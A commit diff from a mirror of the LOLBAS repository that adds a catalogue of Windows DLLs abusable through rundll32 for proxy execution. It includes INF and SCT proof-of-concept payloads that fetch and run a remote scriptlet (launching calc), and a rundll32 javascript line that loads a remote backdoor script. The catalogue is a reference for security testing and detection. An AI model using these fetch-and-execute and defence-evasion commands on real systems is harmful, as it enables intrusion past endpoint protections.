infosecn1nja
/
LOLBAS
mirror of https://github.com/infosecn1nja/LOLBAS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

LOLLibs started

master
api0cradle 2018-04-25 23:39:31 +02:00
parent 763d0b115c
commit d41c104edf
14 changed files with 355 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
LOLLibs.md Normal file
View File

@ -0,0 +1,21 @@
# LOLLibs - Living Off The Land Libraries
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
# OS LIBRARIES
[Advpack.dll](OSLibraries/Advpack.md)
[Ieadvpack.dll](OSLibraries/Ieadvpack.md)
[Ieframe.dll](OSLibraries/Ieframe.md)
[Shdocvw.dll](OSLibraries/Shdocvw.md)
[Shell32.dll](OSLibraries/Shell32.md)
[Url.dll](OSLibraries/Url.md)
[Zipfldr.dll](OSLibraries/Zipfldr.md)
# OTHER MICROSOFT SIGNED LIBRARIES
# OTHER NON MICROSOFT LIBRARIES

24
OSBinaries/Rundll32.md
View File

@ -13,35 +13,11 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
rundll32 shell32.dll,Control_RunDLL payload.dll
rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
rundll32.exe advpack.dll,RegisterOCX calc.exe
rundll32.exe zipfldr.dll,RouteTheCall calc.exe
rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
rundll32.exe url.dll,OpenURL "C:\test\calc.url"
rundll32.exe url.dll, FileProtocolHandler calc.exe
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
```
Acknowledgements:
* Casey Smith - @subtee
* Jimmy - @bohops
* Moriarty - @Moriarty_Meng
* Adam - @hexacorn
* Oddvar Moe - @oddvarmoe
Code sample:
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]

35
OSLibraries/Advpack.md Normal file
View File

@ -0,0 +1,35 @@
## Advpack.dll
* Functions: Execute
```
rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
rundll32.exe advpack.dll,RegisterOCX calc.exe
```
Acknowledgements:
* Jimmy - @bohops
Code sample:
* [Advpack.inf](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack.inf)
* [Advpack_calc.sct](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct)
Resources:
* https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
* https://twitter.com/ItsReallyNick/status/967859147977850880
* https://twitter.com/bohops/status/974497123101179904
Full path:
```
c:\windows\system32\advpack.dll
c:\windows\sysWOW64\advpack.dll
```
Notes:
Detection:

32
OSLibraries/Ieadvpack.md Normal file
View File

@ -0,0 +1,32 @@
## Ieadvpack.dll
* Functions: Execute
```
rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
```
Acknowledgements:
*
Code sample:
* [Ieadvpack.inf](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Ieadvpack.inf)
* [Ieadvpack_calc.sct](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Ieadvpack_calc.sct)
Resources:
*
Full path:
```
c:\windows\system32\ieadvpack.dll
c:\windows\sysWOW64\ieadvpack.dll
```
Notes:
Detection:

29
OSLibraries/Ieframe.md Normal file
View File

@ -0,0 +1,29 @@
## Ieframe.dll
* Functions: Execute
```
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
```
Acknowledgements:
* Adam - @hexacorn
* Jimmy - @bohops
Code sample:
*
Resources:
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
Full path:
```
c:\windows\system32\Ieframe.dll
c:\windows\sysWOW64\Ieframe.dll
```
Notes:
Detection:

14
OSLibraries/Payload/Advpack.inf Normal file
View File

@ -0,0 +1,14 @@
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

44
OSLibraries/Payload/Advpack_calc.sct Normal file
View File

@ -0,0 +1,44 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
<!-- DFIR -->
<!-- .sct files are downloaded and executed from a path like this -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
}
]]>
</script>
</scriptlet>

14
OSLibraries/Payload/Ieadvpack.inf Normal file
View File

@ -0,0 +1,14 @@
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"

44
OSLibraries/Payload/Ieadvpack_calc.sct Normal file
View File

@ -0,0 +1,44 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
<!-- DFIR -->
<!-- .sct files are downloaded and executed from a path like this -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct -->
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
}
]]>
</script>
</scriptlet>

29
OSLibraries/Shdocvw.md Normal file
View File

@ -0,0 +1,29 @@
## Shdocvw.dll
* Functions: Execute
```
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
```
Acknowledgements:
* Adam - @hexacorn
* Jimmy - @bohops
Code sample:
*
Resources:
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
Full path:
```
c:\windows\system32\Shdocvw.dll
c:\windows\sysWOW64\Shdocvw.dll
```
Notes:
Detection:

31
OSLibraries/Shell32.md Normal file
View File

@ -0,0 +1,31 @@
## Shell32.dll
* Functions: Execute
```
rundll32.exe shell32.dll,Control_RunDLL payload.dll
```
Acknowledgements:
* ?
Code sample:
*
Resources:
* https://linktosomethingusefull.com
Full path:
```
c:\windows\system32\shell32.dll
c:\windows\sysWOW64\shell32.dll
```
Notes:
Detection:

32
OSLibraries/Url.md Normal file
View File

@ -0,0 +1,32 @@
## Url.dll
* Functions: Execute
```
rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
rundll32.exe url.dll,OpenURL "C:\test\calc.url"
rundll32.exe url.dll, FileProtocolHandler calc.exe
```
Acknowledgements:
* Jimmy - @bohops
Code sample:
*
Resources:
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
Full path:
```
c:\windows\system32\url.dll
c:\windows\sysWOW64\url.dll
```
Notes:
Detection:

28
OSLibraries/Zipfldr.md Normal file
View File

@ -0,0 +1,28 @@
## Zipfldr.dll
* Functions: Execute
```
rundll32.exe zipfldr.dll,RouteTheCall calc.exe
```
Acknowledgements:
* Moriarty - @moriarty_meng
Code sample:
*
Resources:
* https://twitter.com/moriarty_meng/status/977848311603380224
Full path:
```
c:\windows\system32\zipfldr.dll
c:\windows\sysWOW64\zipfldr.dll
```
Notes:
Detection:

3
README.md
View File

@ -1,8 +1,9 @@
# Living Off The Land Binaries and Scripts
There are two different lists.
There are three different lists.
* [LOLBins](LOLBins.md)
* [LOLLibs](LOLLibs.md)
* [LOLScripts](LOLScripts.md)